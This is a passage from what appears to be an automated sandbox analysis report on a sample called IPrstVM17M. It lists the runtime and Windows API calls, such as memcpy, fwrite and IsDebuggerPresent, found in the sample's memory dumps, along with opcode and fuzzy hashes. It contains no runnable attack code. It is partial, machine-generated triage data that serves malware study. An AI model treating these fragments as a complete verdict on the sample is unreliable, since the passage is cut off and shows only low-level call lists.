                                                        • Part of subcall function 00208780: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,0020BB56,000000FF), ref: 0020881E
                                                        • Part of subcall function 00208780: std::_Facet_Register.LIBCPMT ref: 00208837
                                                        • Part of subcall function 00208780: ??1_Lockit@std@@QAE@XZ.MSVCP140(?,0020BB56,000000FF), ref: 00208852
                                                      • ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP140(?,?,?,?,?,?,?,?,00202377,?,00000021), ref: 002084D2
                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,?,?,?,?,?,?,?,00202377,?,00000021), ref: 002084EA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                       • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                      • String ID: w#
                                                      • API String ID: 3911317180-725151854
                                                      • Opcode ID: c0de788a99eb60ab3333a0844af7c1cd9cbe8014246989742c1f932dc25b9207
                                                      • Instruction ID: 151369d7a9a4c8c59530a7192b8d7b8ed06d73f83759197640356df126119e49
                                                      • Opcode Fuzzy Hash: c0de788a99eb60ab3333a0844af7c1cd9cbe8014246989742c1f932dc25b9207
                                                      • Instruction Fuzzy Hash: 5341F4B4A107059FDB24CF69D848BABBBF5FB48710F10462EE84697792DB74A904CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                       Control-flow graph (rendered image omitted): basic blocks 002075C0-00207828, coloured executed / not executed.
                                                      APIs
                                                      • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00207651
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                       • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: fgetc
                                                      • String ID:
                                                      • API String ID: 2807381905-0
                                                      • Opcode ID: 07cb3206c8e2417a285524cdf0b91258673ca71795d9e52fd1b3704588639676
                                                      • Instruction ID: 40abcbb2c1c2db9317d672cf055b88796a22789ce0178d5957d93c326af6129a
                                                      • Opcode Fuzzy Hash: 07cb3206c8e2417a285524cdf0b91258673ca71795d9e52fd1b3704588639676
                                                      • Instruction Fuzzy Hash: FD819271D1460ADFCB15CFA8C884AAEF7B9FF08314F248219E426A7692D731B955CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                       Control-flow graph (rendered image omitted): basic blocks 00209570-002096B1, coloured executed / not executed.
                                                      APIs
                                                      • memcpy.VCRUNTIME140(00000000,00000000,?,00000000,00000000,00000001,?,00000021,00000000), ref: 00209626
                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000021,00000000,00000000,00000001,?,00000021,00000000), ref: 00209635
                                                      • memcpy.VCRUNTIME140(00000001,00000021,?,00000000,00000000,00000021,00000000,00000000,00000001,?,00000021,00000000), ref: 0020964B
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00000000,00000001,?,00000021,00000000), ref: 002096A0
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 002096AB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                       • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID:
                                                      • API String ID: 1155477157-0
                                                      • Opcode ID: 3ad67ef80ee9d0dadd670b533e54ca5beb498338b041045b01a14cccf867aaa2
                                                      • Instruction ID: 9e2129e9a3607c4d39eaafb90d9536cb1b3588ee03e040ac733cb345879b3e7a
                                                      • Opcode Fuzzy Hash: 3ad67ef80ee9d0dadd670b533e54ca5beb498338b041045b01a14cccf867aaa2
                                                      • Instruction Fuzzy Hash: 9741F772A202019FC704DF3CCD8596EBBA9EF893107648268E816DB3D7DA71ED91CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(3BC7ADCC,00000000,?), ref: 00206F0B
                                                      • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 00206F29
                                                      • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 00206F53
                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00206F69
                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000021,00000032), ref: 00206FAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
                                                      • String ID:
                                                      • API String ID: 1830095303-0
                                                      • Opcode ID: 307615c9ce4bb09b817469d3ce8187c94211f4ecc7a7b8eaf3677c21139889c6
                                                      • Instruction ID: 07f460cb8236817013bf51794c63138f5e781f329c6e553fbe3418d2e0aa2e4c
                                                      • Opcode Fuzzy Hash: 307615c9ce4bb09b817469d3ce8187c94211f4ecc7a7b8eaf3677c21139889c6
                                                      • Instruction Fuzzy Hash: A63155B4600306DFDB14CF18D888B5AFBF9FF48314F20865AE90687792C7B1A954CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • _CxxThrowException.VCRUNTIME140(?,00210348), ref: 00201E57
                                                      • __std_exception_copy.VCRUNTIME140(?,?,?,?,?,00210348), ref: 00201E7E
                                                      • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 00209761
                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      • _CxxThrowException.VCRUNTIME140(?,002102AC), ref: 00209EC5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: ExceptionThrow$__std_exception_copy_callnewhmalloc
                                                      • String ID:
                                                      • API String ID: 3601187372-0
                                                      • Opcode ID: a582d4c86f8cc52e6204d45c24da4952a3e2cd6582ee715f3017cc73127c8d1b
                                                      • Instruction ID: 397b7c98ae66aafec7a3dcdfcff4543b0edfebcaa80d485108bf07c78507fc0f
                                                      • Opcode Fuzzy Hash: a582d4c86f8cc52e6204d45c24da4952a3e2cd6582ee715f3017cc73127c8d1b
                                                      • Instruction Fuzzy Hash: 6201C87583030DBBCB14AFE4EC4588DB7AC9E01350B604625F915DA5D3EBB0E9B48AD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 002073BD
                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 00207437
                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 0020747B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: ?xsputn@?$basic_streambuf@D@std@@@std@@U?$char_traits@fwritememcpy
                                                      • String ID:
                                                      • API String ID: 3343712378-0
                                                      • Opcode ID: eeccb1f6c8b1e5acb00948e8a7597ff3bc367f7d694774705a5e04e1744bd653
                                                      • Instruction ID: 7fbfef0f6cb5cbea03d3a49456b64b2681cb316c60ff01e05cdc13f7790b036e
                                                      • Opcode Fuzzy Hash: eeccb1f6c8b1e5acb00948e8a7597ff3bc367f7d694774705a5e04e1744bd653
                                                      • Instruction Fuzzy Hash: D7314872A287069BCB14CF1DD88096ABBF5FF88710F044669ED4997292D730ED248B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(0000000A), ref: 00208760
                                                      • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@D@Z.MSVCP140 ref: 0020876C
                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140 ref: 00208774
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@
                                                      • String ID:
                                                      • API String ID: 1875450691-0
                                                      • Opcode ID: f36365f763f5c6dcd696f96eac188fc7132cca7a2800e7b660edca959f6920d0
                                                      • Instruction ID: 68cc7ecdf2ba2b93f7d6c8b4c861634fbc5bf0ff6a7df4d3224c93b267671739
                                                      • Opcode Fuzzy Hash: f36365f763f5c6dcd696f96eac188fc7132cca7a2800e7b660edca959f6920d0
                                                      • Instruction Fuzzy Hash: E5D05B75300324DBC60C5B58FC1CA6C7799EB49755B104319FA4AC7392CB255911CBD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00201DB0,?,?,00000000,002027F1,3BC7ADCC,?,?,00000000,00000000,0020A6A0,000000FF,?,0020805E,?), ref: 0020834A
                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,00000000,002027F1,3BC7ADCC,?,?,00000000,00000000,0020A6A0,000000FF,?,0020805E,?,?,?,?), ref: 00208369
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
                                                      • String ID:
                                                      • API String ID: 356833432-0
                                                      • Opcode ID: 4a06176d4f17025d14132af8d507deb86b1bf547d230707ff42c40b3fba8f171
                                                      • Instruction ID: c773948ec67276b5a94833afac4f202647c085cb1ff62aa37e1660778ede5c10
                                                      • Opcode Fuzzy Hash: 4a06176d4f17025d14132af8d507deb86b1bf547d230707ff42c40b3fba8f171
                                                      • Instruction Fuzzy Hash: 78115B70210B26EFC3188F6AE488756FBE5BF88304F548129D94883B51CBB1B879CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0020A134
                                                      • memset.VCRUNTIME140(?,00000000,00000003), ref: 0020A15A
                                                      • memset.VCRUNTIME140(?,00000000,00000050), ref: 0020A1E4
                                                      • IsDebuggerPresent.KERNEL32 ref: 0020A200
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0020A220
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0020A22A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 1045392073-0
                                                      • Opcode ID: 325d81c84664ba9558d506f75df9f5086db059a5e3aedd6ceae0f0d3c8f36d0e
                                                      • Instruction ID: bb23af521595ef431e60b6639a04b59188f533abd781c050e8c12ff5e0607d4b
                                                      • Opcode Fuzzy Hash: 325d81c84664ba9558d506f75df9f5086db059a5e3aedd6ceae0f0d3c8f36d0e
                                                      • Instruction Fuzzy Hash: 883147B5D15318DBDB10DFA4D9897CDBBB8AF08300F5041AAE50CAB291EB719A84CF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0020A30E
                                                      • GetCurrentThreadId.KERNEL32 ref: 0020A31D
                                                      • GetCurrentProcessId.KERNEL32 ref: 0020A326
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0020A333
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 2933794660-0
                                                      • Opcode ID: d5d8b950f6a63a6a27f61a9f232fb41ecab647edc0f985a3b062c673e60c0f0b
                                                      • Instruction ID: b7cf90799addaf76c34f2ef8f0635777a4087924082ded0bea8ef9a9447e407b
                                                      • Opcode Fuzzy Hash: d5d8b950f6a63a6a27f61a9f232fb41ecab647edc0f985a3b062c673e60c0f0b
                                                      • Instruction Fuzzy Hash: 44F0AFB0C10208EBCB00DBB4D989A9EBBF8EF08301F6189959402E7151E734AB04CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00209F5A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-0
                                                      • Opcode ID: 4a6bf2837447ea91159dd165dcb14bc612ccdb90596e2b296404b3ae88d51187
                                                      • Instruction ID: 74149ad99d590ee905624dea944fdc8a424cd6a7d2e0a23f75129dadcbfb5413
                                                      • Opcode Fuzzy Hash: 4a6bf2837447ea91159dd165dcb14bc612ccdb90596e2b296404b3ae88d51187
                                                      • Instruction Fuzzy Hash: C95102B1A1030ADFDB18CF54E8897EABBF2FB58300F50852AD405EB291D775D964CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000A299,00209BD8), ref: 0020A292
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 0c2366b42b39983c9646d578ca47e6f05c4a61dc2663fc90273b83355e6d033d
                                                      • Instruction ID: 4869d41cf9aef9661997a8129aa16343105ab8e9f96adc828adf6745acf5ba84
                                                      • Opcode Fuzzy Hash: 0c2366b42b39983c9646d578ca47e6f05c4a61dc2663fc90273b83355e6d033d
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021,00000000), ref: 00208FE7
                                                      • memcpy.VCRUNTIME140(00000000,?,_% ,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021,00000000), ref: 00209000
                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021,00000000), ref: 00209011
                                                      • memcpy.VCRUNTIME140(?,00000000,?,00000000,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021), ref: 00209024
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021), ref: 00209079
                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021,00000000), ref: 00209091
                                                      • memcpy.VCRUNTIME140(?,00000000,?,?,?,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021), ref: 002090A9
                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,00000000,?,?,?,?,00000000,00000000,00000001,?,0020255F,?,?), ref: 002090B5
                                                      • memcpy.VCRUNTIME140(00000000,00000021,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021,00000000), ref: 002090CC
                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000021,?,00000000,00000000,00000001,?,0020255F,?,?,?,?,00000021), ref: 002090E3
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 002090F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID: _%
                                                      • API String ID: 1155477157-1262239920
                                                      • Opcode ID: d14ddf6fc4dbc7e4a9118d6f0925695cc70c09e6cc679b437418242c41928804
                                                      • Instruction ID: 38a2b51930185841ea421fe34e31a21425e9a294ae0fe1fde0bebf2f1c69b729
                                                      • Opcode Fuzzy Hash: d14ddf6fc4dbc7e4a9118d6f0925695cc70c09e6cc679b437418242c41928804
                                                      • Instruction Fuzzy Hash: 4361B572E10316AFCB10DFB8CC859AFBBB6FF48310B544169E515E7292D6319960CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,002125FC), ref: 00208A16
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,002125FC), ref: 00208A61
                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,002125FC), ref: 00208A69
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00208A91
                                                      • memcpy.VCRUNTIME140(00000000,7FFFFFFF,?,00000000,00000000), ref: 00208B71
                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,7FFFFFFF,?,00000000,00000000), ref: 00208B7F
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00000000), ref: 00208BC2
                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000), ref: 00208BCA
                                                      • memcpy.VCRUNTIME140(7FFFFFFF,?,?,00000000,?,?,00000000,00000000), ref: 00208BD6
                                                        • Part of subcall function 00201EE0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,00207F45), ref: 00201EE5
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00208BF6
                                                        • Part of subcall function 00201E40: _CxxThrowException.VCRUNTIME140(?,00210348), ref: 00201E57
                                                        • Part of subcall function 00201E40: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,00210348), ref: 00201E7E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$ExceptionThrowXlength_error@std@@__std_exception_copy
                                                      • String ID:
                                                      • API String ID: 1121618468-0
                                                      • Opcode ID: 406d023dd619c27cd62c422ae60b6b16228c4ee682d370a9ce79327e0fed4831
                                                      • Instruction ID: feb1eb3b7cf5a2ad9a22f50ea395a7c118b368b8eab022d85666f4065803b226
                                                      • Opcode Fuzzy Hash: 406d023dd619c27cd62c422ae60b6b16228c4ee682d370a9ce79327e0fed4831
                                                      • Instruction Fuzzy Hash: 99A1E372A202059FCB15DF68D88066FBBA6FF84310F644269E855DB383DB70DE618B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • memcpy.VCRUNTIME140(00000000,C:\Users\,?,?,00000000,00000001), ref: 002094CB
                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,C:\Users\,?,?,00000000,00000001), ref: 002094D9
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00000001), ref: 00209516
                                                      • memcpy.VCRUNTIME140(00000000,C:\Users\,?,?,00000000,00000001), ref: 0020951C
                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,C:\Users\,?,?,00000000,00000001), ref: 00209526
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00209540
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
